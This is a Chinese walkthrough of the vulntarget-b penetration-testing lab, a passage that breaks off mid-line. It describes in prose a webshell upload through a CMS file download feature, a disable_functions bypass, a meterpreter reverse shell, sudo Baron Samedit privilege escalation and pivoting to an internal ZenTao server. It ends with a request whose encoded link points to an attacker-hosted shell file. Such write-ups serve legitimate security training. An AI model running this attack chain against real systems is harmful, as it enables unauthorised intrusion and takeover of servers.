01vulntarget-b拓扑

IP1：192.168.10.104

IP2：10.0.20.30

搭建好环境之后，开始我们的实验。

vulntarget-2下载地址

百度云:

链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA

提取码:s4ka

阿里云暂不支持zip文件分享。。。。。

原文地址：vulntarget漏洞靶场系列（二）— vulntarget-b

关于vulntarget漏洞靶场：

https://github.com/crow821/vulntarget

02打 靶 流 程

2.1  WEB渗透-Centos7

对WEB服务器进行端口扫描，看到开放的一些端口情况。其中888是phpmyadmin，8888是bt。

查看一下详情：

来到81端口，是一个极致cms建站系统，从弱口令登录。一开始尝试了很多前台SQL注入漏洞，都不存在：

后台的扩展管理的位置存在任意文件压缩下载，需要启动一个服务，然后再download_url=的位置传入，就会下载文件：

使用冰蝎工具进行连接：

当执行命令的时候，发现函数被禁用了，在phpinfo的位置查看disable_function能看到什么函数被禁用：

然后使用蚁剑的插件进行绕过，成功执行命令：

生成一个反向的后门文件，反弹shell到meterpreter：

使用suggester脚本，进行提权的搜索。存在三个提权的方法：

使用sudo_baron_samedit提权至root权限：

2.2 横向移动-禅道CMS

查看网卡信息，存在第二块网卡：

在根目录发现了flag

接着进行内网渗透，先添加路由表，让我们能跨路由进行攻击：

使用fscan进行端口扫描，但是常规的方式没有发现其他的IP

使用portscan模块指定一部分常用端口，进行扫描。发现了20.66

同样使用nmap的端口扫描，发现开放了3306和8080端口

打开8080是一个禅道cms。这里也是用了注入漏洞，文件读取都未成功：

然后查看文档，使用弱口令登录后台：

使用后台的任意文件下载漏洞获取shell，首先启动一个web服务：

/index.php?m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnB